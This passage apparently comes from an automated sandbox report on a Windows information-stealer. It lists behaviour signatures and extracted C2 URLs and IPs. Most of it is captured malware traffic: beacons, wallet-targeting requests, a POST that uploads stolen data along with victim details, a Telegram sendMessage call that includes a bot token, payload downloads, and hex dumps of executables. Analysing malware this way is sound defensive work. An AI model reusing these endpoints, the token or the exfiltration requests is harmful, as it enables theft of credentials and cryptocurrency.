String found in binary or memory: To debug, this may helpWhat was %p doing in pending_entry_connections in %s?Closing one-hop stream to '%s/%s' because the OR conn just failed.entry_conn->socks_requestGiving up on enclave exit '%s' for destination %s.At %s:%d: %p was unexpectedly in circuit_wait. Closing.Application request to port %d: this port is commonly used for unencrypted protocols. Please make sure you don't send anything you would mind the rest of the Internet reading!%sREJECTWARNDANGEROUS_PORT PORT=%d RESULT=%sPort %d listed in RejectPlaintextPorts. Closing.exitoniononion Invalid %shostname %s; rejectingClient asked for %s:%d.exitThe ".exit" notation is disabled in Tor due to security risks.SOCKS_BAD_HOSTNAME HOSTNAME=%sUnable to automap address %sAutomapping %s to %sREVERSE[%s]Missing mapping for virtual address '%s'. Refusing.Onion address %s requested from a port with .onion disabledResolve requests to hidden services not allowed. Failing.Attachstream to a circuit is not supported for .onion addresses currently. Failing.Using previously configured client authorization for hidden service request.Got a hidden service request for ID '%s'addresstype == ONION_V3_HOSTNAMEfailed to parse hs addressNot fetching.Refetching.usableunusableFound %s descriptor in cache for %s. %s.Invalid service name '%s'No descriptor found in our cache for %s. Fetching.Unknown cache lookup error %dedge_conn->rend_dataedge_conn->hs_identDescriptor is here. Great.Stale automapped address for '%s.exit'. Refusing.Address '%s.exit', with impossible source for the .exit part. Refusing.!automapMalformed exit address '%s.exit'. Refusing.Unrecognized relay in exit address '%s.exit'. Refusing.Excluded relay in exit address '%s.exit'. Refusing.Destination '%s' seems to be an invalid hostname. Failing.Refusing to connect to non-hidden-service hostname or IP address %s because Port has OnionTrafficOnly set (or NoDNSRequest, NoIPv4Traffic, and NoIPv6Traffic).Refusing to connect to hostname %s because Port has NoDNSRequest set.Refusing to connect to IPv4 address %s because Port has NoIPv4Traffic set.Refusing to connect to IPv6 address %s because Port has NoIPv6Traffic set.Application asked to connect to port 0. Refusing.Rejecting request for anonymous connection to private address %s on a TransPort or NATDPort. Possible loop in your NAT rules?%sRejecting SOCKS request for anonymous connection to private address %s.%sRejecting SOCKS request for an IP address family that this listener does not support.Rejecting SOCKS4 request for an IPv6 address.Rejecting SOCKS4 request on a listener with no IPv4 traffic supported.Redirecting address %s to exit at enclave router %saddresstype == ONION_V2_HOSTNAME || addresstype == ONION_V3_HOSTNAMEWarning! You've just connected to a v2 onion address. These addresses are deprecated for security reasons, and are no longer supported in Tor. Please encourage the site operator to upgrade. For more information see https://blog.torproject.org/v2-deprecation-timelineCalled connection_a

Connects to many ports of the same IP (likely port scanning)

Source: global traffic	TCP traffic: 194.169.175.235 ports 42691,1,2,4,6,9
Source: global traffic	TCP traffic: 194.49.94.80 ports 42359,2,3,4,5,9

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 9090
Source: unknown	Network traffic detected: HTTP traffic on port 9090 -> 49766

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Uses ping.exe to check the status of other devices and networks

Source: C:\Users\user\Desktop\jtfCFDmLdX.exe

Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://194.49.94.210/fks/index.php
Source: Malware configuration extractor	URLs: http://194.49.94.210/fks/index.php
Source: Malware configuration extractor	URLs: 194.49.94.80:42359

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: global traffic	HTTP traffic detected: GET /cinoshibot HTTP/1.1Host: t.meConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET //antivm.php?id=1444 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /dlls/System.Data.SQLite.dll HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /dlls/System.Data.SQLite.EF6.dll HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /dlls/System.Data.SQLite.Linq.dll HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /matinrco/tor/releases/download/v0.4.5.10/tor-expert-bundle-v0.4.5.10.zip HTTP/1.1Host: github.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /dlls/x86/SQLite.Interop.dll HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /github-production-release-asset-2e65be/146779096/943f13f9-3eb9-4042-8722-d95f026c8b09?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20231118%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20231118T090238Z&X-Amz-Expires=300&X-Amz-Signature=70af1f9a98f6f7decd9243215e43e906d5d375fed061f16f63b7782e965ba97c&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=146779096&response-content-disposition=attachment%3B%20filename%3Dtor-expert-bundle-v0.4.5.10.zip&response-content-type=application%2Foctet-stream HTTP/1.1Host: objects.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /dlls/x64/SQLite.Interop.dll HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET //dd.php?id=1444 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /?output=xml HTTP/1.1Host: ipwho.isConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /cin.php?ownerid=1444&buildid=ww7legend&countp=0&countc=25&username=user&country=US&ipaddr=156.146.49.168&BSSID=1F8E0289C3&countw=0&rndtoken=Xzedin-807996411835&domaindetects=0 HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------8dbe8d78956b347Host: central-cee-doja.ruContent-Length: 83736Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET //ferr.php?id=1444 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /?output=xml HTTP/1.1Host: ipwho.isConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /getwallet.php?id=1444&wallet=btc HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET //list.php?id=1444 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /getwallet.php?id=1444&wallet=eth HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /getwallet.php?id=1444&wallet=xmr HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /getwallet.php?id=1444&wallet=xlm HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET //list.php?id=1444 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /getwallet.php?id=1444&wallet=xrp HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /getwallet.php?id=1444&wallet=ltc HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /getwallet.php?id=14441&wallet=nec HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET //list.php?id=1444 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /getwallet.php?id=1444&wallet=bch HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /getwallet.php?id=1444&wallet=dash HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /getwallet.php?id=1444&wallet=steam HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET //ready.php?id=4627883 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /test HTTP/1.1Host: trecube.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET //list.php?id=1444 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /getext?id=1 HTTP/1.1Host: trecube.com
Source: global traffic	HTTP traffic detected: GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /getjson?id=1 HTTP/1.1Host: trecube.com
Source: global traffic	HTTP traffic detected: GET //list.php?id=1444 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET //list.php?id=1444 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET //list.php?id=1444 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /cinoshibot HTTP/1.1Host: t.meConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /?output=xml HTTP/1.1Host: ipwho.isConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET //list.php?id=1444 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /getwallet.php?id=1444&wallet=btc HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /getwallet.php?id=1444&wallet=eth HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET //list.php?id=1444 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET //list.php?id=1444 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /getwallet.php?id=1444&wallet=xmr HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /getwallet.php?id=1444&wallet=xlm HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET //list.php?id=1444 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /getwallet.php?id=1444&wallet=xrp HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /getwallet.php?id=1444&wallet=ltc HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /getwallet.php?id=14441&wallet=nec HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET //list.php?id=1444 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /getwallet.php?id=1444&wallet=bch HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /getwallet.php?id=1444&wallet=dash HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /bot6786903508:AAEZrDI4W66M87X4qZRWEVE0zphCeKtMSXc/sendMessage?chat_id=6516807978&text=%23Default%20%20%23Beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E813848%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.14Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F52.86.18.77%3A8080%2Fget%2F3YxUsT%2F42asb_user%40813848_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F52.86.18.77%3A8080%2Fget%2F3YxUsT%2F42asb_user%40813848_report.wsr%22%7D%5D%5D%7D&parse_mode=HTML HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET //list.php?id=1444 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /getwallet.php?id=1444&wallet=steam HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET //list.php?id=1444 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET //list.php?id=1444 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET //list.php?id=1444 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET //list.php?id=1444 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET //list.php?id=1444 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET //list.php?id=1444 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET //list.php?id=1444 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET //list.php?id=1444 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET //list.php?id=1444 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET //list.php?id=1444 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET //list.php?id=1444 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET //list.php?id=1444 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET //list.php?id=1444 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET //list.php?id=1444 HTTP/1.1Host: central-cee-doja.ru
Source: global traffic	HTTP traffic detected: GET /cinoshibot HTTP/1.1Host: t.meConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line?fields=query,country HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cinoshibot HTTP/1.1Host: t.meConnection: Keep-Alive

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 18 Nov 2023 09:02:30 GMTServer: Apache/2.4.29 (Ubuntu)Last-Modified: Thu, 16 Nov 2023 16:34:23 GMTETag: "6ed14-60a4797a219c1"Accept-Ranges: bytesContent-Length: 453908Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1c d0 03 7e 58 b1 6d 2d 58 b1 6d 2d 58 b1 6d 2d 46 e3 f8 2d 4c b1 6d 2d 46 e3 ee 2d 01 b1 6d 2d 46 e3 e9 2d 7f b1 6d 2d 9b be 30 2d 5b b1 6d 2d 58 b1 6c 2d 09 b1 6d 2d 51 c9 e9 2d 59 b1 6d 2d 51 c9 fc 2d 59 b1 6d 2d 52 69 63 68 58 b1 6d 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 68 44 56 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 10 01 00 00 b8 05 00 00 00 00 00 5a 50 00 00 00 10 00 00 00 20 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 00 07 00 00 04 00 00 f1 7a 07 00 03 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 29 e6 06 00 14 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3c cc 06 00 d8 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 08 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 df df 00 00 00 10 00 00 00 e0 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 65 6c 6f 63 00 00 5a 2e 00 00 00 f0 00 00 00 30 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ee 3c 00 00 00 20 01 00 00 3e 00 00 00 14 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 78 78 05 00 00 60 01 00 00 6e 05 00 00 52 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 71 77 72 78 79 62 00 10 00 00 00 e0 06 00 00 0a 00 00 00 c0 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 63 71 77 72 62 73 00 04 00 00 00 f0 06 00 3c 02 00 00 00 ca 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 18 Nov 2023 09:02:33 GMTServer: Apache/2.4.29 (Ubuntu)Last-Modified: Fri, 17 Nov 2023 12:07:50 GMTETag: "103e000-60a57fc402bac"Accept-Ranges: bytesContent-Length: 17031168Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 02 24 00 68 6c 00 00 dc 03 01 00 d2 06 00 c0 14 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 30 0b 01 00 04 00 00 61 9e 04 01 02 00 60 81 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 d0 08 01 4e 00 00 00 00 e0 08 01 64 13 00 00 00 20 09 01 d8 16 00 00 00 d0 01 01 80 0d 00 00 00 00 00 00 00 00 00 00 00 40 09 01 20 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 b9 01 01 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 64 e4 08 01 28 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 90 67 6c 00 00 10 00 00 00 68 6c 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 60 60 2e 64 61 74 61 00 00 00 70 b9 06 00 00 80 6c 00 00 ba 06 00 00 6c 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 87 8e 00 00 40 73 00 00 88 8e 00 00 26 73 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 70 64 61 74 61 00 00 80 0d 00 00 00 d0 01 01 00 0e 00 00 00 ae 01 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 78 64 61 74 61 00 00 90 0b 00 00 00 e0 01 01 00 0c 00 00 00 bc 01 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 62 73 73 00 00 00 00 e0 d0 06 00 00 f0 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 4e 00 00 00 00 d0 08 01 00 02 00 00 00 c8 01 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 64 13 00 00 00 e0 08 01 00 14 00 00 00 ca 01 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 70 00 00 00 00 00 09 01 00 02 00 00 00 de 01 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 10 09 01 00 02 00 00 00 e0 01 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 72 73 72 63 00 00 00 d8 16 00 00 00 20 09 01 00 18 00 00 00 e2 01 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 20 e4 01 00 00 40 09 01 00 e6 01 00 00 fa 01 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
